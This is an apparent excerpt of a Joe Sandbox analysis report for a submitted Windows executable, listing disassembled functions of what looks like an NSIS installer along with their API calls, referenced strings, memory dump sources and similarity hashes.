Function 00402571 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402614
SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402637
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040264D

Part of subcall function 00405BD7: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

Strings

9, xrefs: 004025BC

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: File$ByteCharMultiReadWide$Pointerwsprintf
String ID: 9
API String ID: 1149667376-2366072709
Opcode ID: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
Instruction ID: b7948383e8f2d929eee7054b26862d8c15f429c1db02a3f5617992bcc001f061
Opcode Fuzzy Hash: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
Instruction Fuzzy Hash: CE51ECB1D00219AADF24DFA4DE88AAEB779FF04304F50443BE501B62D0DB759E41CB69

Function 1000248D Relevance: 10.6, APIs: 7, Instructions: 110COMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 100024E1
StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,1000186C,00000000), ref: 100024F5

Part of subcall function 100012F3: lstrcpyW.KERNEL32(00000019,00000000,74DEFFC0,100011AA,?,00000000), ref: 1000131E

GlobalFree.KERNEL32(?), ref: 10002562
GlobalFree.KERNEL32(00000000), ref: 1000258B

Memory Dump Source

Source File: 00000000.00000002.2423803175.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2423786809.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2423816426.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2423866163.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_u9aPQQIwhj.jbxd

Similarity

API ID: FreeGlobal$FromStringlstrcpywsprintf
String ID:
API String ID: 2435812281-0
Opcode ID: 807ecd49f57fcdd2c1ed8b1de5a90652cdea8abff6875a4201383d0a7460da97
Instruction ID: c19482fd6b93636a14d77dfdabfb39ecfcb824cf15b2f076733b0032149e6b96
Opcode Fuzzy Hash: 807ecd49f57fcdd2c1ed8b1de5a90652cdea8abff6875a4201383d0a7460da97
Instruction Fuzzy Hash: B13104B1405A06EFF621DFA4CC9492BBBBCFB403D6722491AF6419216DCB319C50DF64

Function 004027B3 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
GlobalFree.KERNEL32(00000000), ref: 00402875
CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9

Function 00402D18 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402D33
GetTickCount.KERNEL32 ref: 00402D51
wsprintfW.USER32 ref: 00402D7F

Part of subcall function 00405192: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
ShowWindow.USER32(00000000,00000005), ref: 00402DB1

Part of subcall function 00402CFC: MulDiv.KERNEL32(00000000,00000064,0000135E), ref: 00402D11

Strings

... %d%%, xrefs: 00402D79

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: b0884d8abb178ad893e14911fb0f190e16fa5082e452b5273130ec05a42c8e44
Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
Opcode Fuzzy Hash: b0884d8abb178ad893e14911fb0f190e16fa5082e452b5273130ec05a42c8e44
Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E

Function 00404A5C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
GetMessagePos.USER32 ref: 00404A7F
ScreenToClient.USER32(?,?), ref: 00404A99
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1

Strings

f, xrefs: 00404AAD

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5

Function 00402C7D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402C9B
wsprintfW.USER32 ref: 00402CCF
SetWindowTextW.USER32(?,?), ref: 00402CDF
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1

Strings

unpacking data: %d%%, xrefs: 00402CBD, 00402CCD
verifying installer: %d%%, xrefs: 00402CC4

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59

Function 100018C1 Relevance: 7.7, APIs: 5, Instructions: 190COMMON

Download Yara Rule

APIs

Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,?), ref: 10001260
Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271

GlobalFree.KERNEL32(?), ref: 10001928
GlobalFree.KERNEL32(?), ref: 10001AB9
GlobalFree.KERNEL32(?), ref: 10001ABE

Memory Dump Source

Source File: 00000000.00000002.2423803175.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2423786809.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2423816426.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2423866163.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_u9aPQQIwhj.jbxd

Similarity

API ID: FreeGlobal$lstrcpy
String ID:
API String ID: 176019282-0
Opcode ID: 23cb6935698cfd0a96148ac87a657a1f9b0a21a4783a8882718e901bc2f46f3e
Instruction ID: 9dc2e970d319025c61fe02030ab53e3dbd452a3027dd4f32e7c9f695cea78b30
Opcode Fuzzy Hash: 23cb6935698cfd0a96148ac87a657a1f9b0a21a4783a8882718e901bc2f46f3e
Instruction Fuzzy Hash: D451C536F0111AEBFB10DFA488805EDB7F5FB463D0B228169E804A311CDB75AF419B92

Function 00402B78 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B99
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
RegCloseKey.ADVAPI32(?), ref: 00402BDE
RegCloseKey.ADVAPI32(?), ref: 00402C03
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69

Function 10001617 Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002167,?,00000808), ref: 1000162F
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002167,?,00000808), ref: 10001636
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002167,?,00000808), ref: 1000164A
GetProcAddress.KERNEL32(10002167,00000000), ref: 10001651
GlobalFree.KERNEL32(00000000), ref: 1000165A

Memory Dump Source

Source File: 00000000.00000002.2423803175.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2423786809.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2423816426.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2423866163.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_u9aPQQIwhj.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1

Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401CEB
GetClientRect.USER32(00000000,?), ref: 00401CF8
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
DeleteObject.GDI32(00000000), ref: 00401D36

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 20e8b1827cccb196a4384b85b1888191a2ee07b8269210f181c49f722f18a9f7
Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
Opcode Fuzzy Hash: 20e8b1827cccb196a4384b85b1888191a2ee07b8269210f181c49f722f18a9f7
Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39

Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D44
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
ReleaseDC.USER32(?,00000000), ref: 00401D71
CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: de03f2b16b471deeb75989a648f0339490e64a22e039540fc3332c447546e770
Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
Opcode Fuzzy Hash: de03f2b16b471deeb75989a648f0339490e64a22e039540fc3332c447546e770
Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E

Function 00404976 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
wsprintfW.USER32 ref: 00404A10
SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23

Strings

%u.%u%s%s, xrefs: 004049F1

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
Opcode Fuzzy Hash: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC

Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42

Strings

!, xrefs: 00401BFE

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19

Function 00405933 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403510), ref: 00405939
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403510), ref: 00405943
lstrcatW.KERNEL32(?,00409014), ref: 00405955

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405933

Memory Dump Source

Source File: 00000000.00000002.2409069651.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409055983.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409189470.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409210330.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409326733.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_u9aPQQIwhj.jbxd

Similarity

